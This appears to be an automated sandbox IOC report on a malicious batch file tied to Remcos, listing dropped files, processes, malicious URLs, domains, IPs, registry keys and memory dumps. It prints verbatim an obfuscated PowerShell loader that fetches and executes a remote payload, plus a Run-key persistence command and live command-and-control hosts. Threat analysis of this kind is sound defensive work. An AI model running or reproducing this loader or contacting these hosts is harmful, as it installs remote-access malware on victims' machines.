IOC Report
rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat

loading gif

Files

File Path
Type
Category
Malicious
rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat
ASCII text, with very long lines (5674), with no line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dv2aynn.22h.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1yvp1sen.yjk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fb5mf3nb.s1k.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vshfqw3p.ien.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VM7QWPDENMIN1NEHI4X8.temp
data
dropped
C:\Users\user\AppData\Roaming\Overtidsbetalings.Del
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrise Mae ');$Lumpingly=Dtente ' ssi$C unGFo be Orks umrt,riauCrousBrmeeD tar remnGidseFeto.,rdkD opioSanawOttenUnefl TotoIndtaRnk,dUdebF Mari UdllVaabeBrdr( Kas$CirkGCaseePoz o rthpStenhS ako orrnUdvieWeddsCloi,Stan$Pla AOplyaNastuorro)Fili ';$Aau=$Roose110;Trindt94 (Dtente ',ffo$Do.kgStopLC,mpOripsBHaraAS lilKn c:P ctNIndeEEffld uesMa,ylTrilaGastG orft RulEShe,n AgndO,ereJob.= ags(Assut Hy eNonrsOvertrest-S pePJambaBevitGalih Sta Fad$ObelAPre a LevuAmet) Fab ');while (!$Nedslagtende) {Trindt94 (Dtente 'unex$KopigRaffl GenoIrrebina.aWuchlT.ch:TeboPHieriIndvlMedifU.efe Fr,r .aaeQtd rSubdstzar=Inex$,ikttSandrO ttuAr bea ar ') ;Trindt94 $Lumpingly;Trindt94 (Dtente ' yposKupeTKrykale erEmbrTKoge- Ca,SPo yLT caeSkate Prop Bel Skov4fant ');Trindt94 (Dtente 'Abb $Ma.lgDewhl K aoStinBSansAUds lR nd:Bru N l vE Raad KomsSal lIn eaOuttG vertmi rEForrnDi hDBinreArti=Gluc( nmitTykke AkksAukttVa,i-HorapNa.pATi cTMo khDeco Uso,$ samARemoA Q auAcqu)Plad ') ;Trindt94 (Dtente 'Drtr$ rkeG.undLAfkoO ArrBStifARiveLsupe: ,awBFemin R wNJordeFjerNDigt=Begr$P ragParilFagmoFi gbL,ndAThorL Kyn:Aho,SJen tUpstEIndtl,ntrlSophe Em.R draIDerid Be +Auto+ Re % F.u$ Cytu Galn GeldBieneUdreTGlobEKuv R U,miIst o.eknrChocAbradtPapii de nSev gA,ta.M crC TaloSy oUAr mNChevTEn,a ') ;$Geophones=$Undeteriorating[$Bnnen];}$Ahorntrets=344157;$Sknhedsdronningerne=29981;Trindt94 (Dtente 'Angl$PoligHv.vl.agrO YesB riASpidLForb: PreATophlOp kQModeULftei M sfIm.rO ForU Ers1Vare1P,ll9Prog Tam =Treh MyriGChefEBasitRens-Sedac GlaO br.nLo.iTKao E crunSandTNone Mini$BifiABarra UdfU Aut ');Trindt94 (Dtente 'Bi l$O tmgInd lQuinoLecab CoraF,rhlNati:Ba.gSSrprt Hino NavfOvermT aanFomegTarrd F,ae ArbnRe es Bun As e= Bur B nk[XenoSErkeyRecksApnet D,deKnojmKron.InteC hi,oProln SutvS,nke roar Sv tGri ] Cho:Best:Te eFKamprIntroRet mForsBUnreaUplisSubee Spe6 An 4 keSHarptInter ideiSpecnAdd gUran(Rat $ProsAC ocl RigqMalfuSkagiAmidfHoeroMoniuComf1Stri1Feli9 Mas)Sp,n ');Trindt94 (Dtente ' ype$Be.oGCousLRa dOKameBFru aU mil run:hoveDpotaaRockRErhvKPyrhsFil, Mou=Syvm Bere[ rinSfrdsY MasS Rvet KleETilmmFisk.Syntt HjeeUninXU.iltmikr. niteBjarNUmbrcPar o roaDcongiTromnmouzg X n]Stra:Pate: DivaAfsysPterCMariIHuleiN.nf. afsgEufoeDeraTNonpsS,leTC onrIndlIBoofN Sapg cyc( nte$Roqus EjetMurnoUndefnuptm ReknStikGCuidd Ph EHertNStensuini) Sa ');Trindt94 (Dtente 'Tils$HansgMontLVv.ro re.BPrv ACololHema:.ootH ffoF.emvdiffeDye kBi.bA KatTramiaPr,fl S bOVs nGTi,seHel tVe,m=Dipl$EngldIndiARestRVigekReviS Nu.. NonsUnreuOut.bLev,SPh.etBorgRSjklIR glnRapsGRe.i(Knla$FeteaVenlHAktioTongrStdenSti TFor rCongeSo.iT,iliSP,nt,sluk$AftasDds.kGud,nMetahE,zoEUnweDK,ivsparedKo,tRfleeoFugtN patnDeciIsupeNTromgDypneMelaRTrusNDer EMas )An i ');Trindt94 $Hovekataloget;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrise Mae ');$Lumpingly=Dtente ' ssi$C unGFo be Orks umrt,riauCrousBrmeeD tar remnGidseFeto.,rdkD opioSanawOttenUnefl TotoIndtaRnk,dUdebF Mari UdllVaabeBrdr( Kas$CirkGCaseePoz o rthpStenhS ako orrnUdvieWeddsCloi,Stan$Pla AOplyaNastuorro)Fili ';$Aau=$Roose110;Trindt94 (Dtente ',ffo$Do.kgStopLC,mpOripsBHaraAS lilKn c:P ctNIndeEEffld uesMa,ylTrilaGastG orft RulEShe,n AgndO,ereJob.= ags(Assut Hy eNonrsOvertrest-S pePJambaBevitGalih Sta Fad$ObelAPre a LevuAmet) Fab ');while (!$Nedslagtende) {Trindt94 (Dtente 'unex$KopigRaffl GenoIrrebina.aWuchlT.ch:TeboPHieriIndvlMedifU.efe Fr,r .aaeQtd rSubdstzar=Inex$,ikttSandrO ttuAr bea ar ') ;Trindt94 $Lumpingly;Trindt94 (Dtente ' yposKupeTKrykale erEmbrTKoge- Ca,SPo yLT caeSkate Prop Bel Skov4fant ');Trindt94 (Dtente 'Abb $Ma.lgDewhl K aoStinBSansAUds lR nd:Bru N l vE Raad KomsSal lIn eaOuttG vertmi rEForrnDi hDBinreArti=Gluc( nmitTykke AkksAukttVa,i-HorapNa.pATi cTMo khDeco Uso,$ samARemoA Q auAcqu)Plad ') ;Trindt94 (Dtente 'Drtr$ rkeG.undLAfkoO ArrBStifARiveLsupe: ,awBFemin R wNJordeFjerNDigt=Begr$P ragParilFagmoFi gbL,ndAThorL Kyn:Aho,SJen tUpstEIndtl,ntrlSophe Em.R draIDerid Be +Auto+ Re % F.u$ Cytu Galn GeldBieneUdreTGlobEKuv R U,miIst o.eknrChocAbradtPapii de nSev gA,ta.M crC TaloSy oUAr mNChevTEn,a ') ;$Geophones=$Undeteriorating[$Bnnen];}$Ahorntrets=344157;$Sknhedsdronningerne=29981;Trindt94 (Dtente 'Angl$PoligHv.vl.agrO YesB riASpidLForb: PreATophlOp kQModeULftei M sfIm.rO ForU Ers1Vare1P,ll9Prog Tam =Treh MyriGChefEBasitRens-Sedac GlaO br.nLo.iTKao E crunSandTNone Mini$BifiABarra UdfU Aut ');Trindt94 (Dtente 'Bi l$O tmgInd lQuinoLecab CoraF,rhlNati:Ba.gSSrprt Hino NavfOvermT aanFomegTarrd F,ae ArbnRe es Bun As e= Bur B nk[XenoSErkeyRecksApnet D,deKnojmKron.InteC hi,oProln SutvS,nke roar Sv tGri ] Cho:Best:Te eFKamprIntroRet mForsBUnreaUplisSubee Spe6 An 4 keSHarptInter ideiSpecnAdd gUran(Rat $ProsAC ocl RigqMalfuSkagiAmidfHoeroMoniuComf1Stri1Feli9 Mas)Sp,n ');Trindt94 (Dtente ' ype$Be.oGCousLRa dOKameBFru aU mil run:hoveDpotaaRockRErhvKPyrhsFil, Mou=Syvm Bere[ rinSfrdsY MasS Rvet KleETilmmFisk.Syntt HjeeUninXU.iltmikr. niteBjarNUmbrcPar o roaDcongiTromnmouzg X n]Stra:Pate: DivaAfsysPterCMariIHuleiN.nf. afsgEufoeDeraTNonpsS,leTC onrIndlIBoofN Sapg cyc( nte$Roqus EjetMurnoUndefnuptm ReknStikGCuidd Ph EHertNStensuini) Sa ');Trindt94 (Dtente 'Tils$HansgMontLVv.ro re.BPrv ACololHema:.ootH ffoF.emvdiffeDye kBi.bA KatTramiaPr,fl S bOVs nGTi,seHel tVe,m=Dipl$EngldIndiARestRVigekReviS Nu.. NonsUnreuOut.bLev,SPh.etBorgRSjklIR glnRapsGRe.i(Knla$FeteaVenlHAktioTongrStdenSti TFor rCongeSo.iT,iliSP,nt,sluk$AftasDds.kGud,nMetahE,zoEUnweDK,ivsparedKo,tRfleeoFugtN patnDeciIsupeNTromgDypneMelaRTrusNDer EMas )An i ');Trindt94 $Hovekataloget;"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"

URLs

Name
IP
Malicious
pelele.duckdns.org
malicious
http://nuget.org/NuGet.exe
unknown
http://plieltd.top
unknown
https://plieltd.top/Misogynists.pfm
104.21.56.189
http://pesterbdd.com/images/Pester.png
unknown
https://aka.ms/pscore6lB
unknown
https://plieltd.top
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://plieltd.top/P
unknown
https://contoso.com/Icon
unknown
https://plieltd.top/sNFAyMOQkRdGglJM44.binfaltsTrogaranticonstruct.ro/sNFAyMOQkRdGglJM44.bin
unknown
http://www.microsoft.coU
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://plieltd.top/
unknown
https://github.com/Pester/Pester
unknown
https://plieltd.top/Misogynists.pfmP
unknown
https://plieltd.top/sNFAyMOQkRdGglJM44.bin&
unknown
https://plieltd.top/sNFAyMOQkRdGglJM44.bin
104.21.56.189
There are 14 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
pelele.duckdns.org
192.169.69.26
malicious
plieltd.top
104.21.56.189

IPs

IP
Domain
Country
Malicious
192.169.69.26
pelele.duckdns.org
United States
malicious
104.21.56.189
plieltd.top
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\ledernes
Snarliest
HKEY_CURRENT_USER\Environment
Dowdily
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
time
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Diversify
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
4F96000
remote allocation
page execute and read and write
malicious
8920000
heap
page read and write
malicious
568C000
trusted library allocation
page read and write
malicious
891A000
heap
page read and write
malicious
82A0000
direct allocation
page execute and read and write
malicious
8951000
heap
page read and write
malicious
891A000
heap
page read and write
malicious
9E76000
direct allocation
page execute and read and write
malicious
272A04C0000
trusted library allocation
page read and write
malicious
894D000
heap
page read and write
malicious
7EB0000
heap
page read and write
2728E700000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
272921D1000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
7B77000
stack
page read and write
5547000
trusted library allocation
page read and write
8340000
direct allocation
page read and write
272A8660000
heap
page execute and read and write
272A886D000
heap
page read and write
8350000
direct allocation
page read and write
272921D6000
trusted library allocation
page read and write
2B1A000
heap
page read and write
81F0000
trusted library allocation
page read and write
D10000
heap
page read and write
272A887D000
heap
page read and write
8916000
heap
page read and write
A9ED87E000
stack
page read and write
4EB8000
trusted library allocation
page read and write
2728E6D0000
trusted library allocation
page read and write
6EEB000
heap
page read and write
2E04000
heap
page read and write
272A8853000
heap
page read and write
A9ED5F9000
stack
page read and write
7F8A000
heap
page read and write
A9ED97E000
stack
page read and write
8880000
heap
page read and write
2A2D000
stack
page read and write
7CE0000
trusted library allocation
page read and write
2728E62F000
heap
page read and write
27290FEA000
trusted library allocation
page read and write
272A070B000
trusted library allocation
page read and write
7FFD9B965000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
81CC000
stack
page read and write
2728E490000
heap
page read and write
7FFD9B782000
trusted library allocation
page read and write
7FFD9B836000
trusted library allocation
page read and write
7FFD9B962000
trusted library allocation
page read and write
B60000
heap
page read and write
294E000
stack
page read and write
2728E5EC000
heap
page read and write
2728E5EA000
heap
page read and write
6396000
remote allocation
page execute and read and write
2728E5F2000
heap
page read and write
2728FF48000
heap
page read and write
A9ED6F8000
stack
page read and write
242B0000
heap
page read and write
7F99000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
8959000
heap
page read and write
8200000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
23E10000
direct allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
272A8670000
heap
page read and write
68AD000
stack
page read and write
5686000
trusted library allocation
page read and write
23E20000
direct allocation
page read and write
A9ED9FB000
stack
page read and write
8290000
trusted library allocation
page read and write
6EDF000
heap
page read and write
6BAE000
heap
page read and write
2E04000
heap
page read and write
6D1E000
stack
page read and write
891E000
heap
page read and write
8730000
heap
page read and write
7FBE000
heap
page read and write
27290FD0000
trusted library allocation
page read and write
272923F0000
trusted library allocation
page read and write
2728E750000
trusted library allocation
page read and write
272A84D7000
heap
page read and write
7E15000
trusted library allocation
page read and write
23EB0000
heap
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
2B6F000
heap
page read and write
2DEB000
heap
page read and write
B50000
heap
page read and write
891A000
heap
page read and write
8943000
heap
page read and write
27290FF8000
trusted library allocation
page read and write
43EE000
stack
page read and write
8330000
trusted library allocation
page execute and read and write
2C10000
heap
page read and write
8913000
heap
page read and write
25DE000
stack
page read and write
69EA000
stack
page read and write
7FFD9BA70000
trusted library allocation
page read and write
B0E000
stack
page read and write
6CDE000
stack
page read and write
2B5D000
stack
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
A9EE4CD000
stack
page read and write
C80000
heap
page read and write
272A0451000
trusted library allocation
page read and write
7FFD9BB00000
trusted library allocation
page read and write
23E6E000
stack
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
43AE000
stack
page read and write
2A9C000
heap
page read and write
272A0460000
trusted library allocation
page read and write
840000
trusted library allocation
page read and write
82C0000
direct allocation
page read and write
2728E634000
heap
page read and write
810000
trusted library allocation
page read and write
6C9E000
stack
page read and write
D076000
direct allocation
page execute and read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
6F90000
trusted library allocation
page read and write
2728E5E5000
heap
page read and write
8921000
heap
page read and write
7F50000
heap
page read and write
4636000
trusted library allocation
page read and write
8725000
heap
page read and write
C676000
direct allocation
page execute and read and write
7FFD9B990000
trusted library allocation
page read and write
82F0000
direct allocation
page read and write
272A8537000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
A9ED3FB000
stack
page read and write
8640000
direct allocation
page read and write
6AED000
stack
page read and write
25E0000
direct allocation
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
780000
heap
page read and write
272A8450000
heap
page read and write
888A000
heap
page read and write
A876000
direct allocation
page execute and read and write
7BA0000
trusted library allocation
page read and write
7FFD9B931000
trusted library allocation
page read and write
A9ECF26000
stack
page read and write
7FFD9BA60000
trusted library allocation
page read and write
2728E6A0000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
7FFD9B840000
trusted library allocation
page execute and read and write
7FFD9B790000
trusted library allocation
page read and write
2728E6C0000
heap
page readonly
7FFD9B940000
trusted library allocation
page execute and read and write
6FB0000
trusted library allocation
page execute and read and write
81E0000
trusted library allocation
page read and write
3B0000
heap
page read and write
70E000
stack
page read and write
8690000
direct allocation
page read and write
818E000
stack
page read and write
272908EB000
trusted library allocation
page read and write
7EAB000
stack
page read and write
86B0000
direct allocation
page read and write
6EC4000
heap
page read and write
A9ED677000
stack
page read and write
2728E5B3000
heap
page read and write
6D5F000
stack
page read and write
6A2D000
stack
page read and write
A7D000
stack
page read and write
8360000
direct allocation
page read and write
25F0000
direct allocation
page read and write
7B80000
trusted library allocation
page execute and read and write
A9ED37E000
stack
page read and write
7C0D000
stack
page read and write
7100000
trusted library allocation
page read and write
7D0000
heap
page read and write
A9ED47F000
stack
page read and write
A9ED57C000
stack
page read and write
2998000
trusted library allocation
page read and write
6FC0000
trusted library allocation
page read and write
2729067C000
trusted library allocation
page read and write
2728E390000
heap
page read and write
272908DD000
trusted library allocation
page read and write
770000
trusted library section
page read and write
2728E54C000
heap
page read and write
23FA0000
remote allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
7CD0000
trusted library allocation
page read and write
845000
trusted library allocation
page execute and read and write
692E000
stack
page read and write
2C5E000
stack
page read and write
2729222F000
trusted library allocation
page read and write
8959000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
24C0000
heap
page read and write
23FA0000
remote allocation
page read and write
86A0000
direct allocation
page read and write
70ED000
stack
page read and write
7130000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
A827000
trusted library allocation
page read and write
2C0E000
unkown
page read and write
A9ED777000
stack
page read and write
6F98000
trusted library allocation
page read and write
242C0000
heap
page read and write
6AAE000
stack
page read and write
7180000
trusted library allocation
page read and write
3B96000
remote allocation
page execute and read and write
7C80000
trusted library allocation
page read and write
2A30000
heap
page execute and read and write
27290B54000
trusted library allocation
page read and write
842000
trusted library allocation
page read and write
240ED000
stack
page read and write
7CC0000
trusted library allocation
page read and write
7120000
trusted library allocation
page read and write
890000
heap
page read and write
7FAA000
heap
page read and write
272A8890000
heap
page read and write
7C70000
heap
page read and write
AC0000
heap
page read and write
A9ECFEF000
stack
page read and write
27290451000
trusted library allocation
page read and write
A9ECFAE000
stack
page read and write
814000
trusted library allocation
page read and write
272A8800000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
2540000
direct allocation
page read and write
272A8888000
heap
page read and write
7150000
trusted library allocation
page read and write
7FFD9B967000
trusted library allocation
page read and write
7E20000
trusted library allocation
page read and write
2406C000
stack
page read and write
272A8491000
heap
page read and write
2422E000
stack
page read and write
7FFD9B830000
trusted library allocation
page read and write
7F52000
heap
page read and write
86E0000
direct allocation
page read and write
2728E5EE000
heap
page read and write
2729220C000
trusted library allocation
page read and write
7F0000
trusted library section
page read and write
7CE000
stack
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
272A8810000
heap
page read and write
8906000
heap
